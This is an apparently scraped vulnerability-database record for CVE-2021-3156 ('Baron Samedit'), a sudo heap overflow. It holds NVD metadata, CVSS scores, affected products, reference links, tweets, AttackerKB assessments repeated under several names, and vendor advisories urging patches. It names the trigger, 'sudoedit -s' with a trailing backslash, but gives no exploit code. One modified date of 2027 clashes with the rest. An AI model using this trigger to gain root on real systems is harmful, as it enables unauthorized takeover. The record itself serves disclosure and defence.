ID CVE-2021-3156 Type cve Reporter cve@mitre.org Modified 2021-02-23T18:15:00
Description
Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.
{"id": "CVE-2021-3156", "bulletinFamily": "NVD", "title": "CVE-2021-3156", "description": "Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character.", "published": "2021-01-26T21:15:00", "modified": "2021-02-23T18:15:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3156", "reporter": "cve@mitre.org", "references": ["http://www.openwall.com/lists/oss-security/2021/01/27/1", "https://security.gentoo.org/glsa/202101-33", "http://seclists.org/fulldisclosure/2021/Jan/79", "http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html", "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html", "https://www.sudo.ws/stable.html#1.9.5p2", "https://www.debian.org/security/2021/dsa-4839", "http://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html", "http://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html", "http://seclists.org/fulldisclosure/2021/Feb/42", "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability", "http://www.openwall.com/lists/oss-security/2021/01/27/2", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/", "https://support.apple.com/kb/HT212177", "http://www.openwall.com/lists/oss-security/2021/02/15/1", "https://kc.mcafee.com/corporate/index?page=content&id=SB10348", "http://www.openwall.com/lists/oss-security/2021/01/26/3", "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html", "https://www.openwall.com/lists/oss-security/2021/01/26/3", "https://www.synology.com/security/advisory/Synology_SA_21_02", 
"https://www.kb.cert.org/vuls/id/794544", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LHXK6ICO5AYLGFK2TAX5MZKUXTUKWOJY/", "https://security.netapp.com/advisory/ntap-20210128-0002/", "https://security.netapp.com/advisory/ntap-20210128-0001/", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM"], "cvelist": ["CVE-2021-3156"], "type": "cve", "lastseen": "2021-02-25T14:59:41", "edition": 15, "viewCount": 337, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:67AA97AC-E920-4D0C-9B50-6B1C42E683D1"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-3156"]}, {"type": "cisa", "idList": ["CISA:765265E5BF9328E9BAF09F93A1684580"]}, {"type": "cloudlinux", "idList": ["CLSA-2021:1611743864"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:A341C9278C6DD389E0F263AE83CB5579"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7BFF90DF2218C3CFB5ABB1CFE63700E", "RAPID7BLOG:BCCD03F6B72FD7F9410FC063D6F16682", "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C"]}, {"type": "virtuozzo", "idList": ["VZA-2021-004", "VZA-2021-005"]}, {"type": "amazon", "idList": ["ALAS-2021-1478", "ALAS2-2021-1590"]}, {"type": "redhat", "idList": ["RHSA-2021:0219", "RHSA-2021:0223", "RHSA-2021:0220", "RHSA-2021:0225", "RHSA-2021:0226", "RHSA-2021:0221", "RHSA-2021:0218", "RHSA-2021:0222", "RHSA-2021:0224", "RHSA-2021:0227"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-9019", "ELSA-2021-0221", "ELSA-2021-0218"]}, {"type": "slackware", "idList": ["SSA-2021-026-01"]}, {"type": "cisco", "idList": ["CISCO-SA-SUDO-PRIVESC-JAN2021-QNYQFCM"]}, {"type": "nessus", "idList": ["FEDORA_2021-2CB63D912A.NASL", "REDHAT-RHSA-2021-0219.NASL", "ORACLELINUX_ELSA-2021-0218.NASL", "ORACLEVM_OVMSA-2021-0003.NASL", "PHOTONOS_PHSA-2021-1_0-0358_SUDO.NASL", "REDHAT-RHSA-2021-0225.NASL", "ORACLELINUX_ELSA-2021-0221.NASL", "REDHAT-RHSA-2021-0220.NASL", "EULEROS_SA-2021-1366.NASL", 
"REDHAT-RHSA-2021-0226.NASL"]}, {"type": "cert", "idList": ["VU:794544"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161270", "PACKETSTORM:161293", "PACKETSTORM:161230", "PACKETSTORM:161160"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4839-1:0839A", "DEBIAN:DLA-2534-1:AA5E2"]}, {"type": "threatpost", "idList": ["THREATPOST:3A6A7F7256BF05AA048512CF2D064F7F"]}, {"type": "ubuntu", "idList": ["USN-4705-2", "USN-4705-1"]}, {"type": "fedora", "idList": ["FEDORA:353D73154ABE", "FEDORA:60E3A30D1484"]}, {"type": "exploitdb", "idList": ["EDB-ID:49522", "EDB-ID:49521"]}, {"type": "centos", "idList": ["CESA-2021:0221"]}, {"type": "freebsd", "idList": ["F3CF4B33-6013-11EB-9A0E-206A8A720317"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:E2EC45D69AA3550DE981BAC4E63015D3"]}, {"type": "archlinux", "idList": ["ASA-202101-25"]}, {"type": "thn", "idList": ["THN:AF0CBD71A7E1DCE8E508D374E0760687"]}, {"type": "apple", "idList": ["APPLE:103D4315273A04D52814811704A34580", "APPLE:HT212177"]}, {"type": "gentoo", "idList": ["GLSA-202101-33"]}], "modified": "2021-02-25T14:59:41", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2021-02-25T14:59:41", "rev": 2}, "twitter": {"counter": 738, "tweets": [{"link": "https://twitter.com/1337in/status/1364741768151932935", "text": "Need r00t w00t on a box?\nWithout searching for it?\nHodl my beer!!\n\nCVE-2021-3156 \"Baron Samedit\"\n\nSudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \u201csudoedit -s\u201d and a command-line argument that ends with a single backslash character."}, {"link": "https://twitter.com/haisenb3rg/status/1364448268751679490", "text": "Baron Samedit - I have just completed this room! 
Check it out: https://t.co/mfRK5faoBG?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/SudoVulns?src=hashtag_click /hashtag/CVE?src=hashtag_click-2021-3156 /hashtag/Sudo?src=hashtag_click /hashtag/Beginner?src=hashtag_click /hashtag/Tutorial?src=hashtag_click /hashtag/Vulnerability?src=hashtag_click /hashtag/Heap?src=hashtag_click /hashtag/Buffer?src=hashtag_click Overflow /hashtag/BoF?src=hashtag_click /hashtag/sudovulnssamedit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Parasoft/status/1364316032790376449", "text": "Analyze the CVE-2021-3156 heap overflow vulnerability in sudo. Here are step-by-step instructions using Parasoft Insure++. /hashtag/softwaredevelopment?src=hashtag_click /hashtag/BaronSamedit?src=hashtag_click\nhttps://t.co/P5LYoWtO4s?amp=1"}, {"link": "https://twitter.com/GrupoICA_Ciber/status/1364499067015946240", "text": "DEBIAN\nM\u00faltiples vulnerabilidades de severidad alta en productos DEBIAN: \n\nCVE-2021-3156,CVE-2020-35965\n\nM\u00e1s info en: https://t.co/6q3tOOb8KA?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/debian?src=hashtag_click"}, {"link": "https://twitter.com/zevwatts/status/1362748310860271616", "text": "Make sure to update sudo to the latest patch with fix for CVE-2021-3156 when running any Linux distro, including MacOS, and BSD."}, {"link": "https://twitter.com/ryo_hisano/status/1362385116169785348", "text": "sudo\u306e\u8106\u5f31\u6027\u60c5\u5831(Important: CVE-2021-3156 : Baron Samedi) - https://t.co/LZoSyqGEkw?amp=1"}, {"link": "https://twitter.com/yo_ta_n/status/1362550686878101508", "text": "CVE-2021-3156\u306e\u5bfe\u5fdc\u5b8c\u4e86"}, {"link": "https://twitter.com/AlmalikiSheikha/status/1362696671772233741", "text": "CVE-2021-3156 /hashtag/sudo?src=hashtag_click"}, {"link": "https://twitter.com/0x6d6e647a/status/1364409828425093125", "text": "Check out my short blog post discussing memory analysis of the 
/hashtag/BaronSamedit?src=hashtag_click vulnerability in /hashtag/sudo?src=hashtag_click /hashtag/CVE?src=hashtag_click-2021-3156."}, {"link": "https://twitter.com/RobertSchrader/status/1364947017806585861", "text": "Recently, a critical flaw in Linux SUDO was discovered and is being tracked as CVE-2021-3156. More disturbing is the fact that researchers determined the Sudo privilege escalation also impacts the latest version of macOS, Big Sur 11.2.\n\n/hashtag/BaronSamedit?src=hashtag_click"}], "modified": "2021-02-25T14:59:41"}, "vulnersScore": 4.8}, "cpe": ["cpe:/a:mcafee:web_gateway:10.0.4", "cpe:/a:netapp:oncommand_unified_manager_core_package:-", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:netapp:hci_management_node:-", "cpe:/a:sudo_project:sudo:1.9.5", "cpe:/a:mcafee:web_gateway:9.2.8", "cpe:/o:fedoraproject:fedora:32", "cpe:/a:netapp:solidfire:-", "cpe:/o:fedoraproject:fedora:33", "cpe:/a:mcafee:web_gateway:8.2.17"], "affectedSoftware": [{"cpeName": "mcafee:web_gateway", "name": "mcafee web gateway", "operator": "eq", "version": "9.2.8"}, {"cpeName": "sudo_project:sudo", "name": "sudo project sudo", "operator": "lt", "version": "1.9.5"}, {"cpeName": "netapp:oncommand_unified_manager_core_package", "name": "netapp oncommand unified manager core package", "operator": "eq", "version": "-"}, {"cpeName": "mcafee:web_gateway", "name": "mcafee web gateway", "operator": "eq", "version": "10.0.4"}, {"cpeName": "fedoraproject:fedora", "name": "fedoraproject fedora", "operator": "eq", "version": "33"}, {"cpeName": "netapp:solidfire", "name": "netapp solidfire", "operator": "eq", "version": "-"}, {"cpeName": "debian:debian_linux", "name": "debian debian linux", "operator": "eq", "version": "10.0"}, {"cpeName": "fedoraproject:fedora", "name": "fedoraproject fedora", "operator": "eq", "version": "32"}, {"cpeName": "sudo_project:sudo", "name": "sudo project sudo", "operator": "eq", "version": "1.9.5"}, {"cpeName": "mcafee:web_gateway", "name": "mcafee web gateway", 
"operator": "eq", "version": "8.2.17"}, {"cpeName": "netapp:hci_management_node", "name": "netapp hci management node", "operator": "eq", "version": "-"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:8.2.17:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:9.2.8:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:sudo_project:sudo:1.9.5:patch1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:sudo_project:sudo:1.9.5:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.5", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager_core_package:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:a:sudo_project:sudo:1.9.5:patch1:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager_core_package:-:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:web_gateway:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:web_gateway:8.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:web_gateway:9.2.8:*:*:*:*:*:*:*"], "cwe": ["CWE-787"], "scheme": null, "extraReferences": [{"name": "https://www.sudo.ws/stable.html#1.9.5p2", "refsource": "CONFIRM", "tags": ["Release Notes", "Vendor Advisory"], "url": "https://www.sudo.ws/stable.html#1.9.5p2"}, {"name": "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability", "refsource": "MISC", "tags": [], "url": "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability"}, {"name": "[debian-lts-announce] 20210126 [SECURITY] [DLA 2534-1] sudo security update", "refsource": "MLIST", "tags": [], "url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html"}, {"name": "http://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": 
"http://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html"}, {"name": "DSA-4839", "refsource": "DEBIAN", "tags": ["Third Party Advisory"], "url": "https://www.debian.org/security/2021/dsa-4839"}, {"name": "FEDORA-2021-2cb63d912a", "refsource": "FEDORA", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LHXK6ICO5AYLGFK2TAX5MZKUXTUKWOJY/"}, {"name": "[oss-security] 20210127 Re: Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://www.openwall.com/lists/oss-security/2021/01/27/1"}, {"name": "[oss-security] 20210126 Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://www.openwall.com/lists/oss-security/2021/01/26/3"}, {"name": "http://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html"}, {"name": "GLSA-202101-33", "refsource": "GENTOO", "tags": ["Third Party Advisory"], "url": "https://security.gentoo.org/glsa/202101-33"}, {"name": "https://support.apple.com/kb/HT212177", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://support.apple.com/kb/HT212177"}, {"name": "20210126 Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "FULLDISC", "tags": [], "url": "http://seclists.org/fulldisclosure/2021/Jan/79"}, {"name": "20210129 Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021", "refsource": "CISCO", "tags": ["Third Party Advisory"], "url": 
"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM"}, {"name": "VU#794544", "refsource": "CERT-VN", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://www.kb.cert.org/vuls/id/794544"}, {"name": "[oss-security] 20210127 Re: Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://www.openwall.com/lists/oss-security/2021/01/27/2"}, {"name": "https://security.netapp.com/advisory/ntap-20210128-0001/", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://security.netapp.com/advisory/ntap-20210128-0001/"}, {"name": "https://security.netapp.com/advisory/ntap-20210128-0002/", "refsource": "CONFIRM", "tags": ["Third Party Advisory"], "url": "https://security.netapp.com/advisory/ntap-20210128-0002/"}, {"name": "20210211 APPLE-SA-2021-02-09-1 macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update, and macOS Mojave 10.14.6 Security Update 2021-002", "refsource": "FULLDISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "http://seclists.org/fulldisclosure/2021/Feb/42"}, {"name": "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html"}, {"name": "https://www.synology.com/security/advisory/Synology_SA_21_02", "refsource": "CONFIRM", "tags": [], "url": "https://www.synology.com/security/advisory/Synology_SA_21_02"}, {"name": "https://www.openwall.com/lists/oss-security/2021/01/26/3", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "https://www.openwall.com/lists/oss-security/2021/01/26/3"}, {"name": "https://kc.mcafee.com/corporate/index?page=content&id=SB10348", "refsource": "CONFIRM", "tags": ["Third Party 
Advisory"], "url": "https://kc.mcafee.com/corporate/index?page=content&id=SB10348"}, {"name": "FEDORA-2021-8840cbdccd", "refsource": "FEDORA", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/"}, {"name": "[oss-security] 20210215 Re: sudo: Ineffective NO_ROOT_MAILER and Baron Samedit", "refsource": "MLIST", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://www.openwall.com/lists/oss-security/2021/02/15/1"}, {"name": "http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html"}]}
{"attackerkb": [{"lastseen": "2021-02-23T21:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \u201csudoedit -s\u201d and a command-line argument that ends with a single backslash character.\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at January 27, 2021 3:40pm UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. 
It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**MadDud** at January 30, 2021 9:59am UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**dorpor412** at January 27, 2021 8:10am UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. 
This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**marshalcn** at January 27, 2021 6:16am UTC reported:\n\nSudo is vulnerable to a local privilege escalation that enables any local user to gain root privileges. This is due to a heap-based buffer overflow when unescaping backslashes in the command\u2019s arguments. This vulnerable code has been introduced in [July 2011](<https://github.com/sudo-project/sudo/commit/8255ed69b9c426d90a10c6d68e8d2241d7f3260e>). According to the [advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>), legacy versions from 1.8.2 to 1.8.31p2 and stable versions from 1.9.0 to 1.9.5p1 are vulnerable in their default configurations. 
Note that the local user password is not required to successfully exploit this vulnerability.\n\nThe exploitation is done by invoking \u201csudoedit -s\u201d command to reach the vulnerable code and do an out-of-bounds write in heap memory. The security researchers were able to exploit this vulnerability and get a shell as root using 3 different methods. One of them, which seems to be the easiest and the most reliable, is demo\u2019ed in this [video](<https://vimeo.com/504872555>).\n\nI couldn\u2019t find any PoC available, but there are enough technical details in the advisory to write an exploit. It is a critical bug and sudo should be [patched](<https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_5p2>) immediately. It is very likely a working exploit will be publicly available soon.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2\n", "modified": "2021-02-05T00:00:00", "published": "2021-01-26T00:00:00", "id": "AKB:67AA97AC-E920-4D0C-9B50-6B1C42E683D1", "href": "https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit", "type": "attackerkb", "title": "CVE-2021-3156 \"Baron Samedit\"", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2021-02-10T21:38:44", "bulletinFamily": "software", "cvelist": ["CVE-2021-3156"], "description": "Palo Alto Networks Product Security Assurance team has evaluated the Sudo software vulnerability CVE-2021-3156.\n\nPAN-OS software, Prisma Cloud compute, and CloudGenix devices do not include the Sudo program and, therefore, no scenarios required for successful exploitation exist in these Palo Alto Networks products.\n\n**Work around:**\nNo work around available.", "edition": 1, "modified": "2021-02-10T17:00:00", "published": "2021-02-10T17:00:00", "id": "PA-CVE-2021-3156", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2021-3156", "title": "Informational: Impact of Sudo Vulnerability CVE-2021-3156", "type": "paloalto", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:37", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "Sudo has released an advisory addressing a heap-based buffer overflow vulnerability\u2014CVE-2021-3156\u2014affecting sudo legacy versions 1.8.2 through 1.8.31p2 and stable versions 1.9.0 through 1.9.5p1. Sudo is a utility included in many Unix- and Linux-based operating systems that allows a user to run programs with the security privileges of another user. An attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to update to sudo version 1.9.5p2, refer to vendors for available patches, and review the following resources for additional information.\n\n * [Sudo Advisory](<https://www.sudo.ws/alerts/unescape_overflow.html>)\n * [Qualys Blog](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>)\n * [CERT Coordination Center Vulnerability Note VU#794544](<https://kb.cert.org/vuls/id/794544>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/02/sudo-heap-based-buffer-overflow-vulnerability-cve-2021-3156>); we'd welcome your feedback.\n", "modified": "2021-02-04T00:00:00", "published": "2021-02-02T00:00:00", "id": "CISA:765265E5BF9328E9BAF09F93A1684580", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/02/sudo-heap-based-buffer-overflow-vulnerability-cve-2021-3156", "type": "cisa", "title": "Sudo Heap-Based Buffer Overflow Vulnerability \u2014 CVE-2021-3156", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudlinux": [{"lastseen": "2021-02-04T13:26:22", "bulletinFamily": 
"unix", "cvelist": ["CVE-2021-3156"], "description": "Fix CVE-2021-3156: Heap-based buffer overflow in sudo.", "modified": "2027-01-27T12:30:00", "published": "2021-01-27T12:30:00", "id": "CLSA-2021:1611743864", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "type": "cloudlinux", "title": "Fix CVE-2021-3156: Heap-based buffer overflow in sudo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-02-04T13:21:57", "bulletinFamily": "blog", "cvelist": ["CVE-2021-3156"], "description": "**Update Feb 3, 2021**: It [has been reported](<https://twitter.com/hackerfantastic/status/1356645638151303169>) that macOS, AIX, and \nSolaris are also vulnerable to CVE-2021-3156, and that others may also \nstill be vulnerable. Qualys has not independently verified the exploit.\n\n**Original Post**: The Qualys Research Team has discovered a heap overflow vulnerability in sudo, a near-ubiquitous utility available on major Unix-like operating systems. Any unprivileged user can gain root privileges on a vulnerable host using a default sudo configuration by exploiting this vulnerability.\n\nSudo is a powerful utility that\u2019s included in most if not all Unix- and Linux-based OSes. It allows users to run programs with the security privileges of another user. The vulnerability itself has been hiding in plain sight for nearly 10 years. It was introduced in July 2011 (commit 8255ed69) and affects all legacy versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1 in their default configuration.\n\nSuccessful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). 
